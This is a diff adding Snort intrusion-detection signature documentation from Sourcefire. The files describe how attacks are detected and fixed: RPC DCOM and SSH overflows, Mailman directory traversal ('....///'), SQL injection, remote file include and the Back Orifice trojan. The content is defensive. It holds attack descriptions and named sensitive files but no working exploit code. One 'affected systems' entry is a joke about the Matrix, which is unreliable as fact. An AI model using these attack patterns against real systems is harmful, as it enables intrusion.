+Detailed Information:
+Multiple vulnerabilities exist in Apple Quick Time Streaming Server and 
+Apple Darwin Streamin Server, such that an attacker can gain information
+on the file system as an intelligence gathering activity for an attack 
+on vulnerable services.
+
+It is also possible for an attacker to inject malicious code into the 
+log file for the server, the impact of this would be to execute the code
+when viewed by the administrator.
+
+It is also directly vulnerable to cross site scripting issues.
+
+--
+Affected Systems:
+	Apple Darwin Streaming Server 4.1.2
+	Apple Quicktime Streaming Server 4.1.1
+
+--
+Attack Scenarios:
+In the case of injecting code to the log files, the attacker would need 
+to make requests to the streaming server with the code inserted in the 
+request.
+
+The attacker can execute an attack on the file system contents using a 
+browser, the attacker needs to include a NULL byte in the request to 
+reveal the directory structure.
+
+The cross site scripting issue does not need anything specific to be 
+done.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches for the systems affected.
+
+Upgrade to the latest non affected versions of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6960
+http://www.securityfocus.com/bid/6990
+http://www.securityfocus.com/bid/6955
+http://www.securityfocus.com/bid/6956
+http://www.securityfocus.com/bid/6958
+
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0054
+
+--
--- /dev/null
+++ b/doc/signatures/3375.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3375
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000576.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000576
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_edit.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "cat_edit.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3131.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+3131
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in GNU Mailman.
+
+-- 
+Impact: 
+Information disclosure.
+
+--
+Detailed Information:
+GNU Mailman is used to manage mailing lists. It is written in Python and
+is available on a variety of platforms.
+
+GNU Mailman when used with webservers that do not remove extra slashes
+from URLs, is prone to a directory traversal attack that may allow an
+attacker access to sensitive files on an affected system.
+
+--
+Affected Systems:
+	GNU Mailman in conjunction with Apache 1.3.x
+
+--
+Attack Scenarios: 
+An attacker can supply extra slashes and dots (....///) to a URL to
+escape the web root and access other parts of the host filesystem.
+
+-- 
+Ease of Attack: 
+Simple. Exploit software is not required.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/556.txt
@@ -0,0 +1,93 @@
+Rule:  
+
+--
+
+Sid:
+
+556
+
+--
+
+Summary:
+
+A network-internal client has connected to an external GNUTella server
+and issued a connect attempt to begin communications.
+
+--
+
+Impact:
+
+Possible policy violation.
+
+--
+
+Detailed Information:
+
+GNUTella is a P2P (Peer-to-Peer) protocol for exchanging arbitrary
+files.  Depending on your site's policies, using it may be a policy
+violation.
+
+If not properly configured, GNUTella clients may accidentally share out
+confidential files.  GNUTella worms (which use deceptive names to
+encourage download) and viruses may also be accidentally downloaded by a
+client.
+
+This rule being triggered means that a GNUTella client has been detected
+on your network.
+
+--
+
+Affected Systems:
+
+Any system with a GNUTella client installed (available for most
+platforms)
+
+--
+
+Attack Scenarios:
+It is possible for an inside attack to take place by using peer-to-peer
+clients to transfer corporate data from an internal resource to an
+external third party.
+
+--
+
+Ease of Attack:
+Simple. This is peer-to-peer activity.
+
+--
+
+False Positives:
+
+This rule detects the term "GNUTELLA CONNECT" on all ports.  As a
+result, any email, web page, or other network content that discusses the
+protocol and its messages will trigger this alert.
+
+--
+
+False Negatives:
+
+None known.
+
+--
+
+Corrective Action:
+
+Depends on acceptable use policies.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Gene R Gomez (gene!AT!gomezbrothers!DOT!com)
+
+-- 
+
+Additional References:
+
+GNUTella
+http://www.gnutella.com
+
+Gnutella Protocol
+http://rfc-gnutella.sourceforge.net/developer/testing/
+
+--
--- /dev/null
+++ b/doc/signatures/1253.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1253
+
+--
+Summary:
+This event is generated after a sucessful exploit of the BSD derived Telnet daemon.
+
+--
+Impact:
+Remote root access.  This may or may not indicate a successful root 
+compromise of a telnet server.
+
+--
+Detailed Information:
+This event is generated after a possible sucessful attempt to compromise
+a server running a BSD derived version of Telnet. A buffer overflow
+condition exists that may present an attacker with the opportunity to
+execute code of their choosing.
+
+The attacker does not need to login to the server to exploit this
+vulnerability, only a connection to the server is needed.
+
+--
+Affected Systems:
+	Multiple Vendor Telnet servers running versions of telnetd derived
+	from the BSD telnet daemon.
+
+--
+Attack Scenarios:
+An attacker may utilize one of the available exploit scripts.
+
+--
+Ease of Attack:
+Simple. Exploit scripts are publicly available. This vulnerability may
+also be exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Consider using Secure Shell instead of telnet.
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1325.txt
@@ -0,0 +1,108 @@
+Rule:
+
+--
+Sid:
+1325
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in implementations of Secure Shell (ssh) version 1.
+
+NOTE: This rule is NOT enabled by default. The rule looks for the
+overflow pattern and as such can generate false positive events.
+
+--
+Impact:
+A buffer overflow will allow an attack to execute any arbitrary commands
+with the privileges of the root user, leading to full compromise of the 
+system and perhaps other systems as well.
+
+--
+Detailed Information:
+SSH is a secure replacement for telnet/ftp/r* commands. Both commercial 
+and non-commercial implementations are available.
+
+The vulnerability exists in the integer calculation in SSH version 1 or 
+SSH version 2 with a backward compatibility enabled.
+
+By sending a crafted packet to SSH daemon, an attacker could manipulate 
+the return address of the affected function call, allowing arbitrary 
+code execution on the target system.
+
+A protocol weakness in SSH1 opened all compliant servers to an
+information integrity vulnerability allowing block cipher-encrypted
+packets to be modified silently by an intermediary attacker.  Patches
+were developed to defend against this weakness, but several servers
+contained an exploitable integer overflow within detection code.
+
+A successful attack will allow corruption of the ssh daemon, allowing
+code to be run with its privileges.
+
+--
+Affected Systems:
+	Cisco IOS 12.0S
+	Cisco IOS 12.1xx-12.2xx
+	SSH Communications Security SSH 2.x and 3.x 
+	SSH Communications Security SSH 1.2.23-1.2.31
+	F-Secure SSH versions prior to 1.3.11-2
+	OpenSSH versions prior to 2.3.0
+	Systems running the Matrix as seen in Reloaded.
+
+--
+Attack Scenarios:
+A vulnerable machine may be probed using any banner grabber. 
+An attacker then attempts to overflow the integer calculations buffer 
+and execute /bin/sh.
+
+Once a session is initiated with the remote SSH server and block
+ciphering is agreed upon, successfully forcing a CRC32 check opens up
+room for the exploit (which is publically available).  The integer
+overflow is generally a brute-force method, which may generate several
+log lines of the form:
+
+hostname sshd[xxx]: Disconnecting: crc32 compensation attack: network
+attack detected
+
+--
+Ease of Attack:
+Simple. Scanners and exploits are available.
+
+--
+False Positives:
+Possible (especially in the face of null encryption), but unlikely.
+Look for several log lines of the type described above.
+
+--
+False Negatives:
+This rule works by looking for "filler space" in the exploit, used
+to properly size a heap overflow.  Clever exploits can quite easily
+change the information placed here.
+
+--
+Corrective Action:
+Use access control restrictions ("AllowHosts" or "DenyHosts)
+
+Disable SSH version 1 support
+
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com) and Nick Black, Reflex Security <dank@reflexsecurity.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/945216
+
+CERT Advisory:
+http://www.cert.org/advisories/CA-2001-35.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000541.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000541
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Dating Agent" application running on a webserver. Access 
+to the file "picture.php" with SQL commands being passed as the "pid" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "pid" parameter in the "picture.php" script used by the 
+"Dating Agent" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Dating Agent
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/3140.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3140
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
--- /dev/null
+++ b/doc/signatures/1579.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1579
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/121-1.txt
@@ -0,0 +1,98 @@
+
+
+Rule:
+
+--
+Sid:
+121-1
+
+--
+Summary:
+This event is generated when the pre-processor flow-portscan detects
+network traffic that may constitute an attack. Specifically a fixed
+scale scanner limit exceeded event was generated.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the flow-portscan pre-processor detects
+network traffic that may consititute an attack.
+
+The flow-portscan pre-processor uses a flow based technique to identify
+portscanning in one-to-many and many-to-one scenarios based on flow
+creation in the flow pre-processor.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.flow-portscan in the docs directory
+of the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+detailed instructions and examples on how to tune and use the
+pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Chris Green <cmg@snort.org>
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/485.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+485
+
+--
+Summary:
+This event is generated when a router was unable to forward a packet due
+to filtering and used the Internet Control Message Protocol to alert
+involved hosts.
+
+--
+Impact:
+Unknown. This particular message is meant only to be informative but can be
+indicative of malicious activity (spoofed traffic, DoS).
+
+--
+Detailed Information:
+A packet sent between two points on a network was administratively
+prohibited via filtering of some sort. The host or device performing the
+filtering returned an ICMP message informing the apparent source host
+that filtering had been done.
+
+--
+Affected Systems:
+	All systems.
+
+--
+Attack Scenarios:
+In a DoS attack it is common to to use spoofed source addresses.  If
+and when the traffic gets filtered and an ICMP message is returned,
+the spoofed source address will be the recipient of the ICMP message.
+A similar situation may occur when a large portscan is occuring and an
+attempt is made to mask the true source of the scan by using spoofed
+source addresses.  
+
+--
+Ease of Attack:
+Simple. Tools are readily available that can craft arbitrary ICMP
+packets. It is also possible to spoof packets using arbitrary
+addresses potentially causing intermediary routers to generate ICMP
+messages.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+None needed unless messages become excessive or appear to be invalid. 
+
+Determine what traffic caused this particular ICMP message to be
+generated and act accordingly.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+RFC 1812:
+ftp://ftp.isi.edu/in-notes/rfc1812.txt
+
+--
--- /dev/null
+++ b/doc/signatures/3149.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3149
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in Microsoft Internet Explorer.
+
+--
+Impact:
+Serious. Code execution is possible leading to unauthorized
+administrative access to the target host.
+
+--
+Detailed Information:
+Microsoft Internet Explorer uses the Object tag to identify ActiveX
+controls sometimes used in web content.
+
+A programming error in the processing of a buffer that handles the
+"item" parameter of an object tag can lead to the exposure of a buffer
+overflow condition. An attacker may be able to overflow this buffer and
+supply code of their choosing to be executed on the system with the
+privileges of the administrative account.
+
+The procedure that checks the length of a buffer that handles the item
+parameter may be bypassed by using the slash character either directly
+or via encoding methods. This vulnerability may be exploited whenever
+Internet Explorer is used to read HTML files.
+
+--
+Affected Systems:
+	Systems using Microsoft Windows
+
+--
+Attack Scenarios:
+An attacker can overflow a buffer by inserting extra data into the input
+parameter of a malicious html file. The attacker may then insert code of
+their choosing to either run commands on the system or execute the code
+with the privileges of the administrative account.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1750.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid: 1750
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a 
+potential weakness on a host running Microsoft Internet Information Server (IIS).
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit 
+potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation 
+on the host, this may be the prelude to an attack against that host
+using that information. Specifically, this event indicates an attempt to
+retrieve the file "users.xml" which may contain username and password
+information for the host.
+
+--
+Affected Systems:
+	Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS 
+implementation. The attacker might then gain administrator access to the site, 
+deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken 
+to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft
+http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpguide/html/cpconusercredentialsfileusersxml.asp
+
+--
--- /dev/null
+++ b/doc/signatures/100000853.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000853
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "IceWarp" application running on a webserver. Access to the file "settings.html" using a remote file being passed as the "language" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "language" parameter in the "settings.html" script used by the "IceWarp" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using IceWarp
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/112.txt
@@ -0,0 +1,104 @@
+Rule:
+Backdoor.BackOrifice
+
+--
+Sid:
+112, 116
+
+--
+Summary:
+Backdoor.BackOrifice is a Trojan Horse.
+
+Server Port: 31337 although in later versions this port can be changed
+to a value between 1 and 65535
+Protocol: UDP although in later versions TCP can also be used
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to. This Trojan
+also has the ability to delete data, steal passwords and disable the
+machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+
+The Trojan changes system registry settings to add the BackOrifice sever
+to programs normally started on boot. Due to the nature of this Trojan
+it is unlikely that the attacker's client IP address has been spoofed.
+
+The default name of the server application is UMGR32, which can be
+changed on first use. The new application may be installed in the system
+or system32 direcory and the original may also be deleted.
+
+Event messages relating to activity from this Trojan are:
+
+	SID	Message
+	---	-------
+	112	BackOrifice access (outgoing TCP connection)
+	116	BackOrifice access (incoming UDP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
+
+Registry keys added may vary, look for spurious entries in the above
+locations.
+
+BackOrifice may hide the process from viewing inthe Windows task
+manager. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS399
+
+Symantec Security Response
+http://www.symantec.com/avcenter/venc/data/back.orifice2000.trojan.html
+
+--
--- /dev/null
+++ b/doc/signatures/2284.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2284
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application MediaWiki running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code and unauthorized administrative
+access to the target system.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application MediaWiki . This application
+does not perform stringent checks when handling user input, this may 
+lead to the attacker being able to execute PHP code and include php files 
+of the attackers choosing.
+
+--
+Affected Systems:
+	MediaWiki MediaWiki-stable 20031107
+	MediaWiki MediaWiki-stable 20030829
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator 
+by supplying input of their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2138.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2138
+
+--
+Summary:
+This event is generated when an attempt is made to access a configuration file for the php application Web-ERP. 
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a configuration file for the php application Web-ERP.
+
+Versions of the web based accounting system Web-ERP do not sufficiently protect the application configuration files. This could lead to sensitive information being disclosed to an unauthorized user.
+
+This rule generates an event if a request is made for the configuration file "logicworks.ini".
+
+--
+Affected Systems:
+Web-ERP Web-ERP 0.1.4
+
+--
+Attack Scenarios:
+An attacker can gain access to the application configuration by making a simple web request. The attacker might then use the information in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+The event will also be generated if Nessus is used to scan the host for this vulnerability.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1621.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+1621
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
